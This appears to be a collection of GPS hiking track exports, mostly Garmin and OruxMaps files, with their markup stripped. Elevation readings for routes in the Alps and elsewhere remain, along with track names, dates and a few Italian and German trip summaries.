+1558.4 + + + +1544.0 + + + +1546.9 + + + +1550.3 + + + +1555.1 + + + +1548.3 + + + +1547.9 + + + +1541.6 + + + +1517.1 + + + +1524.8 + + + +1498.8 + + + +1484.9 + + + +1472.9 + + + +1465.7 + + + +1459.4 + + + +1447.4 + + + +1450.8 + + + +1428.2 + + + +1443.6 + + + +1466.2 + + + +1461.8 + + + +1462.3 + + + +1456.5 + + + +1453.7 + + + +1454.6 + + + +1459.4 + + + +1439.2 + + + +1435.4 + + + +1436.8 + + + +1423.4 + + + +1449.3 + + + +1438.3 + +" +" + + + + + + +Garmin International + + +2015-03-23 14:34:01 + + + + + + +799.57 + + + +800.96 + + + +801.29 + + + +800.77 + + + +802.7 + + + +830.07 + + + +839.14 + + + +867.65 + + + +883.14 + + + +883.26 + + + +884.92 + + + +893.86 + + + +925.42 + + + +935.86 + + + +942.03 + + + +960.52 + + + +970.14 + + + +960.0 + + + +955.34 + + + +943.23 + + + +924.97 + + + +922.32 + + + +913.79 + + + +910.67 + + + +928.81 + + + +947.21 + + + +1001.11 + + + +1012.29 + + + +1012.02 + + + +978.43 + + + +982.68 + + + +960.78 + + + +958.52 + + + +957.67 + + + +966.64 + + + +926.47 + + + +923.71 + + + +909.92 + + + +900.33 + + + +885.41 + + + +883.32 + + + +871.76 + + + +860.79 + + + +856.26 + + + +856.8 + + + +860.58 + + + +861.36 + + + +828.21 + + + +813.56 + + + +812.81 + +" +" + + +2016-01-09 20:32 + + + + + +OruxMaps + + + +2016-01-09 20:32 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2016-01-09 20:32</h2><br /><p>Orario inizio: 01/09/2016 20:32</p><p>Orario fine: 01/09/2016 21:58</p><p>Distanza: 3,8km (01:26)</p><p>Tempo movimento: 01:00</p><p>Velocità media: 2,6km/h</p><p>Velocità media mov.: 3,8km/h</p><p>Max. Velocità: 22,9km/h</p><p>Altitudine minima: 1527m</p><p>Altitudine massima: 1698m</p><p>Velocità di salita: 253,5m/h</p><p>Velocità di discesa: -367m/h</p><p>Dislivello positivo: 195m</p><p>Perdita di elevazione: -209m</p><p>Tempo di salita: 00:46</p><p>Tempo di discesa: 00:34</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +1541.8 + + + +1546.25 + + + +1535.85 + + + +1543.5 + + + +1548.56 + + + +1549.09 + + + +1573.13 + + + +1576.32 + + + +1583.33 + + + +1586.5 + + + +1613.2 + + + +1609.9 + + + +1623.51 + + + +1629.71 + + + +1640.65 + + + +1645.19 + + + +1671.2 + + + +1648.86 + + + +1661.2 + + + +1663.89 + + + +1672.46 + + + +1681.78 + + + +1698.6 + + + +1675.01 + + + +1683.07 + + + +1681.21 + + + +1645.68 + + + +1624.55 + + + +1611.9 + + + +1591.79 + + + +1585.66 + + + +1579.16 + + + +1566.51 + + + +1557.57 + + + +1537.97 + + + +1527.21 + +" +" + + + + + + +Garmin International + + +01-OKT-16 13:26:58 + + + + + +1857.4 + + + +1898.26 + + + +1897.3 + + + +1898.26 + + + +1898.74 + + + +1898.74 + + + +1897.78 + + + +1899.22 + + + +1899.7 + + + +1915.08 + + + +1920.85 + + + +1914.12 + + + +1907.87 + + + +1899.22 + + + +1899.22 + + + +1917.01 + + + +1919.41 + + + +1942.48 + + + +1969.88 + + + +1968.92 + + + +2022.75 + + + +2084.76 + + + +2121.77 + + + +2209.25 + + + +2252.51 + + + +2294.8 + + + +2312.11 + + + +2329.89 + + + +2359.69 + + + +2399.59 + + + +2441.89 + + + +2461.11 + + + +2469.28 + + + +2455.34 + + + +2423.14 + + + +2392.38 + + + +2364.5 + + + +2317.88 + + + +2263.08 + + + +2247.22 + + + +2238.09 + + + +2204.92 + + + +2151.09 + + + +2079.95 + + + +2026.6 + + + +2001.6 + + + +1989.1 + + + +1974.69 + + + +1966.99 + + + +1968.44 + + + +1973.72 + + + +1947.29 + + + +1920.85 + + + +1920.85 + + + +1914.12 + + + +1917.01 + + + +1917.01 + + + +1895.38 + + + +1892.49 + + + +1892.01 + + + +1895.86 + + + +1905.47 + +" +" + + + + + + +Garmin International + + + +2017-01-08 13:12:01 + + + + + + + + +572.62 + + + +574.14 + + + +579.98 + + + +586.08 + + + +585.81 + + + +584.96 + + + +576.87 + + + +581.76 + + + +579.32 + + + +580.91 + + + +579.57 + + + +568.52 + + + +557.35 + + + +555.58 + + + +538.07 + +" +" + + + + + + +Garmin International + + + +Aktueller Track: 15 MRZ 2015 10:00 + + + + + + +734.58 + + + +686.39453125 + + +686.0546875 + + +685.734375 + + +685.328125 + + +718.72 + + + +717.76 + + + +706.23 + + + +702.38 + + + +694.69 + + + +687.0 + + + +672.58 + + + +666.81 + + + +662.01 + + + +661.04 + + + +659.12 + + + +656.72 + + + +656.24 + + + +652.87 + + + +652.87 + + + +658.16 + + + +652.87 + + + +649.99 + + + +650.47 + + + +648.07 + + + +647.1 + + + +646.14 + + + +646.62 + + + +646.14 + + + +646.62 + + + +643.74 + + + +648.55 + + + +649.03 + + + +649.03 + + + +649.99 + + + +650.47 + + + +650.95 + + + +650.95 + + + +651.91 + + + +652.87 + + + +653.83 + + + +653.35 + + + +655.28 + + + +654.8 + + + +672.58 + + + +678.35 + + + +667.29 + + + +659.6 + + + +663.93 + + + +661.52 + + + +662.97 + + + +659.12 + + + +662.97 + + + +668.25 + + + +673.06 + + + +673.54 + + + +675.46 + + + +676.91 + + + +678.83 + + + +683.63 + + + +683.63 + + + +677.91796875 + + +677.25 + + +685.34375 + + +686.40234375 + + +686.390625 + + +681.71 + +" +" + + + + + + + +Cala Goloritzè +15 mai 2015 1:09 pm + + + +121.472 + + + +123.308 + + + +149.121 + + + +158.927 + + + +226.708 + + + +241.317 + + + +249.972 + + + +258.828 + + + +265.879 + + + +278.444 + + + +291.421 + + + +300.929 + + + +315.805 + + + +357.571 + + + +391.075 + + + +401.273 + + + +416.499 + + + +430.715 + + + + +" +" + + + + + + +Garmin International + + + +150917-kanzelsteig-3000m-365HM + + + + + + +732.0 + + + +729.0 + + + +747.0 + + + +769.0 + + + +778.0 + + + +795.0 + + + +799.0 + + + +823.0 + + + +825.0 + + + +866.0 + + + +852.0 + + + + + + +827.0 + + + + + + + + + + + + + + + + + + + + + +1034.0 + + + +1047.0 + + + +1044.0 + + + +1041.0 + + + +1032.0 + + + +1013.0 + + + +1016.0 + + + +1004.0 + + + +978.0 + + + +959.0 + + + +956.0 + + + +908.0 + + + +901.0 + + + +883.0 + + + +867.0 + + + +857.0 + + + +849.0 + + + +844.0 + + + +835.0 + + + +828.0 + + + +820.0 + + + +823.0 + + + +800.0 + + + +783.0 + + + +770.0 + + + +748.0 + + + +729.0 + + + +731.0 + +" +" + + + + +2015-08-02 07:16 + + +1601.0 + + +1613.0 + + +1622.0 + + +1629.0 + + +1632.0 + + +1640.0 + + +1640.0 + + +1644.0 + + +1659.0 + + +1673.0 + + +1667.0 + + +1663.0 + + +1663.0 + + +1650.0 + + +1708.0 + + +1719.0 + + +1764.0 + + +1793.0 + + +1802.0 + + +1819.0 + + +1843.0 + + +1863.0 + + +1868.0 + + +1889.0 + + +1903.0 + + +1912.0 + + +1927.0 + + +1960.0 + + +1981.0 + + +1978.0 + + +2027.0 + + +2050.0 + + +2073.0 + + +2085.0 + + +2113.0 + + +2157.0 + + +2151.0 + + +2184.0 + + +2184.0 + + +2183.0 + + +2170.0 + + +2165.0 + + +2168.0 + + +2172.0 + + +2172.0 + + +2178.0 + + +2211.0 + + +2238.0 + + +2240.0 + + +2257.0 + + +2270.0 + + +2297.0 + + +2282.0 + + +2302.0 + + +2344.0 + + +2401.0 + + +2510.0 + + +2559.0 + + +2599.0 + + +2607.0 + + +2685.0 + + +2723.0 + + +2711.0 + + +2741.0 + + +2747.0 + + +2775.0 + + +2801.0 + + +2853.0 + + +2845.0 + + +2874.0 + + +2887.0 + + +2932.0 + + +2967.0 + + +2969.0 + + +3028.0 + + +3034.0 + + +3040.0 + + +3057.0 + + +3100.0 + + +3126.0 + + +3199.0 + + +3212.0 +" +" + + +Steinkarspitze + + + + + +OruxMaps + + + +Steinkarspitze +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Steinkarspitze</h2><br /><p>Startzeit: 07/31/2015 07:40</p><p>Zielzeit: 07/31/2015 10:03</p><p>Strecke: 3,8km (02:22)</p><p>Bewegungszeit: 01:17</p><p>Ø-Geschwindigkeit: 1,6km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,7km/h</p><p>Minimale Höhe: 1360m</p><p>Maximale Höhe: 2214m</p><p>Steig-Geschw.: 404,3m/h</p><p>Sink-Geschw.: -164,2m/h</p><p>Aufstieg: 869m</p><p>Abstieg: -34m</p><p>Steigzeit: 02:08</p><p>Sinkzeit: 00:12</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1380.57 + + + +1362.6 + + + +1382.87 + + + +1391.28 + + + +1394.31 + + + +1401.54 + + + +1395.14 + + + +1413.8 + + + +1419.64 + + + +1417.87 + + + +1436.86 + + + +1444.34 + + + +1474.25 + + + +1494.09 + + + +1511.47 + + + +1525.1 + + + +1540.74 + + + +1565.73 + + + +1586.21 + + + +1635.96 + + + +1654.14 + + + +1687.98 + + + +1693.98 + + + +1725.25 + + + +1744.37 + + + +1764.62 + + + +1772.74 + + + +1800.88 + + + +1832.43 + + + +1844.87 + + + +1847.05 + + + +1864.56 + + + +1872.24 + + + +1885.66 + + + +1891.25 + + + +1927.02 + + + +1973.75 + + + +2021.62 + + + +2063.9 + + + +2094.37 + + + +2131.91 + + + +2185.93 + + + +2214.94 + +" +" + + +a Monte Cengelino + + + + + +OruxMaps + + + +a Monte Cengelino +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: a Monte Cengelino</h2><br /><p>Startzeit: 01/18/2016 14:05</p><p>Zielzeit: 01/18/2016 15:50</p><p>Strecke: 4,1km (01:45)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 13,5km/h</p><p>Minimale Höhe: 1439m</p><p>Maximale Höhe: 2140m</p><p>Steig-Geschw.: 428,3m/h</p><p>Sink-Geschw.: -444,3m/h</p><p>Aufstieg: 709m</p><p>Abstieg: -24m</p><p>Steigzeit: 01:39</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1439.58 + + + +1460.3 + + + +1459.46 + + + +1475.18 + + + +1488.04 + + + +1484.82 + + + +1488.16 + + + +1502.06 + + + +1518.19 + + + +1542.23 + + + +1559.01 + + + +1570.15 + + + +1576.03 + + + +1552.05 + + + +1575.22 + + + +1589.19 + + + +1619.59 + + + +1633.29 + + + +1636.69 + + + +1654.14 + + + +1683.44 + + + +1697.18 + + + +1718.78 + + + +1735.12 + + + +1757.81 + + + +1793.17 + + + +1813.77 + + + +1822.18 + + + +1837.06 + + + +1876.65 + + + +1894.19 + + + +1941.67 + + + +1958.69 + + + +1974.19 + + + +1992.83 + + + +2027.19 + + + +2062.13 + + + +2109.5 + + + +2140.65 + +" +" + + + + + + +Garmin International + + +2015-09-22 11:18:28 + + + + + + +1087.1 + + + +1080.83 + + + +1071.66 + + + +1069.88 + + + +1060.81 + + + +1054.56 + + + +1066.89 + + + +1076.91 + + + +1081.0 + + + +1075.74 + + + +1077.91 + + + +1075.63 + + + +1073.66 + + + +1072.45 + + + +1072.93 + + + +1070.49 + + + +1073.15 + + + +1075.2 + + + +1076.78 + + + +1072.6 + + + +1054.34 + + + +1043.37 + + + +1051.45 + + + +1050.47 + + + +1045.42 + + + +1048.75 + + + +1048.44 + + + +1045.73 + + + +1034.36 + + + +1024.98 + + + +1017.36 + + + +1016.7 + + + +1013.93 + + + +1010.96 + + + +1004.52 + + + +1002.92 + + + +999.75 + + + +999.28 + + + +995.93 + + + +995.55 + + + +993.05 + + + +990.29 + + + +989.75 + + + +987.07 + + + +984.97 + + + +983.46 + + + +982.54 + + + +980.63 + + + +978.92 + + + +977.94 + + + +978.4 + + + +979.5 + + + +982.48 + + + +989.52 + + + +992.57 + + + +991.8 + + + +991.82 + +" +" + + +KOMPASS Digital Map Track + + + + + + + +Grün + + + + + + +1536.28 + + + +1521.65 + + + +1529.66 + + + +1537.48 + + + +1529.66 + + + +1535.48 + + + +1537.79 + + + +1541.25 + + + +1563.41 + + + +1566.54 + + + +1583.98 + + + +1578.81 + + + +1580.49 + + + +1592.8 + + + +1588.78 + + + +1588.76 + + + +1599.48 + + + +1618.0 + + + +1627.06 + + + +1625.15 + + + +1638.83 + + + +1645.26 + + + +1648.31 + + + +1646.7 + + + +1655.4 + + + +1638.84 + + + +1653.95 + + + +1642.12 + + + +1642.52 + + + +1623.95 + + + +1623.82 + + + +1603.47 + + + +1588.06 + + + +1571.04 + + + +1568.27 + + + +1560.51 + + + +1554.15 + + + +1513.74 + + + +1536.63 + + + +1533.5 + + + +1520.49 + + + +1504.38 + + + +1480.02 + + + +1483.19 + + + +1461.87 + + + +1454.75 + + + +1443.75 + + + +1442.27 + + + +1446.11 + + + +1459.82 + + + +1467.43 + + + +1472.47 + + + +1485.13 + + + +1490.27 + + + +1508.38 + + + +1506.84 + + + +1528.63 + + + +1532.87 + + + +1527.76 + + + +1538.2 + + + +1523.53 + + + +1529.76 + +" +" + + + + + + +Garmin International + + +09-AUG-16 11:30:42 AM + + + + + +1335.89 + + + +1340.22 + + + +1342.62 + + + +1347.91 + + + +1352.71 + + + +1356.56 + + + +1362.33 + + + +1369.05 + + + +1373.86 + + + +1389.24 + + + +1399.82 + + + +1418.56 + + + +1437.79 + + + +1447.88 + + + +1461.34 + + + +1474.8 + + + +1480.57 + + + +1494.03 + + + +1505.56 + + + +1514.69 + + + +1524.31 + + + +1544.01 + + + +1561.32 + + + +1587.27 + + + +1590.64 + + + +1614.67 + + + +1628.13 + + + +1652.16 + + + +1666.1 + + + +1676.68 + + + +1697.83 + + + +1715.61 + + + +1730.99 + + + +1773.29 + + + +1793.48 + + + +1801.65 + + + +1808.86 + + + +1814.63 + + + +1804.53 + + + +1794.92 + + + +1772.81 + + + +1768.48 + + + +1770.89 + + + +1767.52 + + + +1761.27 + + + +1768.0 + + + +1755.02 + + + +1751.66 + + + +1734.36 + + + +1719.94 + + + +1712.73 + + + +1687.73 + + + +1680.52 + + + +1661.78 + + + +1651.68 + + + +1648.8 + + + +1599.29 + + + +1594.0 + + + +1580.06 + + + +1567.57 + + + +1554.11 + + + +1536.8 + + + +1526.23 + + + +1515.18 + + + +1504.12 + + + +1486.82 + + + +1484.41 + + + +1465.19 + + + +1457.5 + + + +1434.91 + + + +1434.42 + + + +1427.7 + +" +" + + + + + + +CompeGPS TEAM, SL + + + +Llacs Engelberg + + + +1922.8 + + + +1921.7 + + + +1935.5 + + + +1976.1 + + + +2031.5 + + + +2060.1 + + + +2127.4 + + + +2116.4 + + + +2112.9 + + + +2147.7 + + + +2219.4 + + + +2238.3 + + + +2397.4 + + + +2411.8 + + + +2398.9 + + + +2255.2 + + + +2222.4 + + + +2142.8 + + + +2199.7 + + + +2190.5 + + + +2141.8 + + + +2097.5 + + + +2079.7 + + + +2055.5 + + + +2047.9 + + + +2061.0 + + + +2031.8 + + + +2004.9 + + + +2003.4 + + + +1976.5 + + + +1979.7 + + + +1974.5 + + + +1953.9 + + + +1956.5 + + + +1987.0 + + + +1894.9 + + + +1877.0 + + + +1898.2 + + + +1858.7 + + + +1835.3 + + + +1864.4 + + + +1889.7 + + + +1872.7 + + + +1944.8 + + + +1954.3 + + + +2009.0 + + + +2078.0 + + + +2143.0 + + + +2156.2 + + + +2140.0 + + + +2170.5 + + + +2197.6 + + + +2202.1 + + + +2155.7 + + + +2123.4 + + + +2101.4 + + + +2062.3 + + + +2019.4 + + + +1971.2 + + + +1903.5 + + + +1777.7 + + + +1781.2 + + + +1769.6 + + + +1761.0 + + + +1760.5 + + + +1786.1 + +" +" + + + +Polar + + + + + + + + +1367.0 + + + +1359.0 + + + +1360.0 + + + +1347.0 + + + +1328.0 + + + +1330.0 + + + +1328.0 + + + +1314.0 + + + +1308.0 + + + +1318.0 + + + +1321.0 + + + +1326.0 + + + +1340.0 + + + +1351.0 + + + +1361.0 + + + +1375.0 + + + +1383.0 + + + +1394.0 + + + +1420.0 + + + +1427.0 + + + +1434.0 + + + +1460.0 + + + +1476.0 + + + +1476.0 + + + +1476.0 + + + +1503.0 + + + +1513.0 + + + +1541.0 + + + +1556.0 + + + +1563.0 + + + +1589.0 + + + +1621.0 + + + +1637.0 + + + +1638.0 + + + +1654.0 + + + +1721.0 + + + +1727.0 + + + +1756.0 + + + +1804.0 + + + +1893.0 + + + +1928.0 + + + +1969.0 + + + +1993.0 + + + +2016.0 + + + +2029.0 + + + +2060.0 + + + +2103.0 + + + +2112.0 + + + +2136.0 + + + +2156.0 + +" +" + + + +Raphael Alfred Rohner + + + + +Endomondo + + +http://www.endomondo.com/ + +endomondo +HIKING + + + + + +2860.8 + + + +2867.9 + + + +2863.4 + + + +2849.4 + + + +2860.0 + + + +2846.6 + + + +2833.0 + + + +2828.0 + + + +2825.9 + + + +2813.0 + + + +2812.1 + + + +2801.1 + + + +2794.6 + + + +2797.2 + + + +2800.8 + + + +2801.1 + + + +2800.9 + + + +2806.7 + + + +2807.0 + + + +2785.0 + + + +2784.2 + + + + + + + + +" +" + + + + + + +Garmin International + + + +24-MAI-15 + + + + + + +938.3840332 + + +972.9916992 + + +984.0466309 + + +1007.5991211 + + +1018.1733398 + + +1033.5544434 + + +1049.4162598 + + +1076.333252 + + +1081.6203613 + + +1098.9240723 + + +1101.8083496 + + +1106.6147461 + + +1110.9406738 + + +1116.2280273 + + +1122.9572754 + + +1131.6088867 + + +1137.3769531 + + +1145.5480957 + + +1149.8742676 + + +1152.2773438 + + +1154.2001953 + + +1160.9291992 + + +1169.5812988 + + +1185.923584 + + +1201.3046875 + + +1205.1499023 + + +1213.3212891 + + +1225.8181152 + + +1234.9509277 + + +1244.5639648 + + +1242.1606445 + + +1249.8513184 + + +1251.2932129 + + +1251.7739258 + + +1264.2709961 + + +1313.7788086 + + +1325.3146973 + + +1341.1765137 + + +1345.0217285 + + +1365.6901855 + + +1384.435791 + + +1389.2424316 + + +1399.8168945 + + +1416.1591797 + + +1430.5791016 + + +1440.1923828 + + +1450.2861328 + + +1459.8991699 + + +1465.6672363 + + +1456.0539551 + + +1455.5734863 + + +1454.6120605 + + +1455.5734863 + + +1454.1315918 + + +1447.8828125 + + +1423.3693848 + + +1420.0046387 + + +1391.645752 + + +1374.8227539 + + +1341.1765137 + + +1300.3205566 + + +1277.2490234 + + +1261.8679199 + + +1193.1333008 + + +1191.6914063 + + +1185.923584 + + +1183.0395508 + + +1175.348877 + + +1167.1779785 + + +1157.0839844 + + +1148.9128418 + + +1146.9899902 + + +1151.3161621 + + +1146.0288086 + + +1141.7028809 + + +1140.7414551 + + +1140.7414551 +" +" + + + + + + + +Linie + + + +1808.2 + + +1829.2 + + +1849.0 + + +1850.0 + + +1858.9 + + +1882.0 + + +1886.9 + + +1888.5 + + +1891.2 + + +1893.1 + + +1893.7 + + +1891.9 + + +1888.7 + + +1888.1 + + +1892.5 + + +1890.3 + + +1891.9 + + +1892.0 + + +1893.8 + + +1898.9 + + +1914.3 + + +1916.4 + + +1932.1 + + +1949.4 + + +1950.9 + + +1942.9 + + +1927.3 + + +1930.6 + + +1935.5 + + +1937.0 + + +1937.2 + + +1937.6 + + +1939.9 + + +1941.8 + + +1944.4 + + +1946.3 + + +1948.5 + + +1952.6 + + +1962.2 + + +1971.5 + + +1973.3 + + +1970.0 + + +1968.3 + + +1963.5 + + +1963.1 + + +1969.2 + + +1975.1 + + +1976.8 + + +1978.4 + + +1978.8 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +Punta Giordani + + + +3280.0 + + + +3281.0 + + + +3284.0 + + + +3288.0 + + + +3313.0 + + + +3327.0 + + + +3400.0 + + + +3410.0 + + + +3431.0 + + + +3446.0 + + + +3473.0 + + + +3500.0 + + + +3525.0 + + + +3552.0 + + + +3589.0 + + + +3610.0 + + + +3652.0 + + + +3671.0 + + + +3693.0 + + + +3722.0 + + + +3741.0 + + + +3774.0 + + + +3798.0 + + + +3823.0 + + + +3864.0 + + + +3872.0 + + + +3985.0 + + + +4023.0 + + + +4047.0 + + + +4050.0 + + + +4048.0 + + + +4016.0 + + + +3931.0 + + + +3910.0 + + + +3861.0 + + + +3819.0 + + + +3784.0 + + + +3700.0 + + + +3662.0 + + + +3635.0 + + + +3498.0 + + + +3362.0 + + + +3324.0 + + + +3307.0 + + + +3287.0 + + + +3274.0 + + + +3275.0 + +" +" + + + + + + + +MMPASS B + + + +2203.8 + + +2200.4 + + +2202.8 + + +2225.7 + + +2204.8 + + +2232.5 + + +2235.8 + + +2227.3 + + +2234.7 + + +2222.1 + + +2225.4 + + +2233.3 + + +2225.6 + + +2224.0 + + +2236.6 + + +2230.6 + + +2231.6 + + +2236.8 + + +2235.0 + + +2233.3 + + +2228.2 + + +2227.7 + + +2229.3 + + +2221.0 + + +2232.2 + + +2225.5 + + +2221.6 + + +2225.3 + + +2224.8 + + +2232.8 + + +2225.8 + + +2232.5 + + +2231.5 + + +2239.1 + + +2245.9 + + +2252.1 + + +2257.7 + + +2280.8 + + +2290.3 + + +2307.4 + + +2306.4 + + +2315.1 + + +2328.9 + + +2326.8 + + +2339.2 + + +2330.7 + + +2334.2 + + +2340.6 + + +2353.4 + + +2356.1 + + +2371.4 + + +2392.6 + + +2389.7 + + +2396.8 + + +2411.1 + + +2415.2 + + +2423.7 + + +2439.5 + + +2463.4 + + +2472.6 + + +2485.1 + + +2494.3 + + +2505.3 + + +2534.0 + + +2556.8 + + +2589.5 + + +2638.1 + + +2654.6 + + +2701.4 + + +2713.6 + + +2723.2 + + +2756.4 + + +2780.4 + + +2803.4 + + +2815.4 + + +2826.4 + + +2821.3 + + +2836.3 +" +" + + +Tourenplanung am 19. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 19. Juli 2016 + + + +1926.20328 + + +1924.55269 + + +1917.89667 + + +1926.72934 + + +1930.29777 + + +1940.68677 + + +1956.02508 + + +1968.65461 + + +2012.90998 + + +2018.74538 + + +2024.0246 + + +2025.83295 + + +2027.85848 + + +2027.99089 + + +2027.6758 + + +2029.05025 + + +2027.65106 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +AAALUG-14 12:28:01 PM + + + + + +1882.4 + + + +1954.5 + + + +1957.38 + + + +1967.48 + + + +1972.28 + + + +1977.09 + + + +1977.57 + + + +1977.57 + + + +1977.09 + + + +1977.57 + + + +1978.53 + + + +1980.45 + + + +1979.97 + + + +1979.01 + + + +1979.01 + + + +1979.97 + + + +1985.26 + + + +1996.32 + + + +2017.46 + + + +2028.04 + + + +2034.77 + + + +2061.2 + + + +2065.53 + + + +2077.55 + + + +2086.68 + + + +2092.45 + + + +2095.33 + + + +2098.7 + + + +2114.08 + + + +2126.09 + + + +2136.19 + + + +2154.93 + + + +2161.66 + + + +2174.16 + + + +2186.18 + + + +2203.0 + + + +2211.17 + + + +2220.78 + + + +2226.07 + + + +2240.01 + + + +2246.74 + + + +2255.87 + + + +2265.0 + + + +2284.71 + + + +2296.25 + + + +2333.74 + + + +2365.46 + + + +2397.67 + + + +2422.66 + + + +2437.56 + + + +2449.58 + + + +2471.69 + + + +2491.39 + + + +2530.33 + + + +2522.16 + + + +2526.96 + + + +2547.15 + +" +" + + + + + + + +2014-05-18 14:31:57 + + + +410.14 + + +408.7 + + +409.66 + + +406.29 + + +405.33 + + +406.29 + + +409.66 + + +409.18 + + +409.66 + + +410.14 + + +412.06 + + +412.54 + + +413.02 + + +412.54 + + +413.02 + + +413.02 + + +412.54 + + +414.47 + + +416.39 + + +413.5 + + +413.98 + + +413.98 + + +413.98 + + +414.95 + + +413.98 + + +414.47 + + +413.02 + + +413.5 + + +413.5 + + +413.98 + + +414.47 + + +414.47 + + +414.95 + + +415.43 + + +414.95 + + +414.95 + + +415.43 + + +415.43 + + +414.95 + + +416.87 + + +416.39 + + +416.39 + + +415.91 + + +418.79 + + +417.83 + + +417.83 + + +416.87 + + +417.83 + + +416.39 + + +419.27 + + +420.23 + + +422.16 + + +421.19 + + +417.83 + + +416.87 + + +417.83 + + +418.31 + + +416.39 + + +414.95 + + +416.87 + + +415.43 + + +416.39 + + +415.91 + + +415.91 + + +421.19 + + +417.35 + + +416.39 + + +417.83 + + +422.64 + + +422.16 + + +423.12 + + +417.35 + + +419.27 + + +421.19 + + +420.71 + + +417.35 + + +417.35 + + +417.83 + + +413.5 + + +413.02 + + +416.87 + + +415.43 + + +415.91 + + +415.91 + + +416.39 + + +416.39 +" +" + + + +Federal Office of Topography Switzerland + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-06-03 16:54:23 + + + + + + +1082.75 + + + +1077.87 + + + +1077.67 + + + +1068.91 + + + +1061.05 + + + +1065.55 + + + +1072.47 + + + +1176.45 + + + +1195.39 + + + +1174.77 + + + +1159.8 + + + +1152.69 + + + +1156.84 + + + +1162.49 + + + +1164.89 + +" +" + + +Eptingen - Walten - Läufelfingen + + + + + + + + + +539.8 + + +536.6 + + +524.8 + + +525.6 + + +535.6 + + +538.5 + + +541.8 + + +550.7 + + +563.5 + + +606.0 + + +621.2 + + +634.9 + + +637.5 + + +636.8 + + +640.7 + + +612.5 + + +582.4 + + +583.2 + + +585.6 + + +584.7 + + +607.6 + + +653.7 + + +656.5 + + +678.1 + + +681.7 + + +702.6 + + +720.3 + + +751.3 + + +764.3 + + +782.1 + + +773.2 + + +747.3 + + +740.3 + + +753.1 + + +769.0 + + +790.5 + + +792.1 + + +801.3 + + +810.0 + + +844.1 + + +868.0 + + +892.8 + + +907.0 + + +898.3 + + +885.8 + + +870.2 + + +864.7 + + +857.7 + + +850.4 + + +840.0 + + +832.8 + + +763.4 + + +760.0 + + +759.8 + + +749.7 + + +716.9 + + +695.0 + + +675.2 + + +668.6 + + +649.0 + + +641.5 + + +635.9 + + +610.7 + + +602.1 + + +583.9 + + +565.2 + + +561.4 + + +558.8 + + +558.8 + + +559.0 +" +" + + +Amrum Norsspitze + +Gerhard Weber - Community + + + + + +Amrum Norsspitze + + + +2.0 + + +5.0 + + +7.3 + + +2.5 + + +1.3 + + +1.62534 + + +2.74343 + + +1.39997 + + +1.91357 + + +1.34864 + + +-0.30047 + + +1.23615 + + +1.39299 + + +0.4888 + + +3.55565 + + +3.37097 + + +1.84756 +" +" + + + + + + +Garmin International + + + +Traccia corrente: 25 GIU 2015 08:15 + + + + + + +457.72 + + + +458.69 + + + +463.01 + + + +469.74 + + + +474.55 + + + +491.85 + + + +517.81 + + + +544.72 + + + +575.01 + + + +601.92 + + + +625.47 + + + +642.78 + + + +652.87 + + + +689.88 + + + +785.53 + + + +798.03 + + + +802.36 + + + +806.68 + + + +838.41 + + + +834.08 + + + +861.0 + + + +864.84 + + + +876.86 + + + +874.94 + + + +885.03 + + + +888.4 + + + +895.61 + + + +901.85 + + + +908.58 + + + +914.83 + + + +919.64 + + + +917.72 + + + +917.72 + + + +917.24 + + + +915.31 + + + +899.45 + + + +868.21 + + + +859.08 + + + +842.73 + + + +822.06 + + + +814.37 + + + +817.26 + + + +820.14 + + + +818.22 + + + +793.22 + + + +776.4 + + + +760.06 + + + +746.6 + + + +723.53 + + + +700.94 + + + +686.52 + + + +662.49 + + + +645.66 + + + +632.68 + + + +606.25 + + + +597.12 + + + +577.89 + + + +565.39 + + + +557.22 + + + +523.09 + + + +491.85 + + + +470.22 + + + +455.8 + + + +444.27 + + + +443.31 + + + +451.48 + + + +455.32 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Lammschlucht + + + + + + +Lammschlucht + + + +716.35 + + +716.3799999999999 + + +718.4999999999997 + + +721.8599999999996 + + +723.0499999999995 + + +725.7899999999995 + + +727.3499999999993 + + +727.7599999999994 + + +728.5999999999993 + + +728.97 + + +733.1199999999999 + + +735.1199999999999 + + +736.5999999999998 + + +738.5299999999996 + + +737.9899999999997 + + +740.4799999999993 + + +739.2099999999994 + + +749.6499999999993 + + +744.7399999999993 + + +748.2799999999994 + + +747.4799999999994 + + +752.24 + + +751.7100000000002 + + +751.3500000000003 + + +763.4800000000001 + + +770.2099999999999 + + +771.6899999999998 + + +802.5799999999998 + + +812.28 + + +811.4799999999998 + + +814.05 + + +814.64 + + 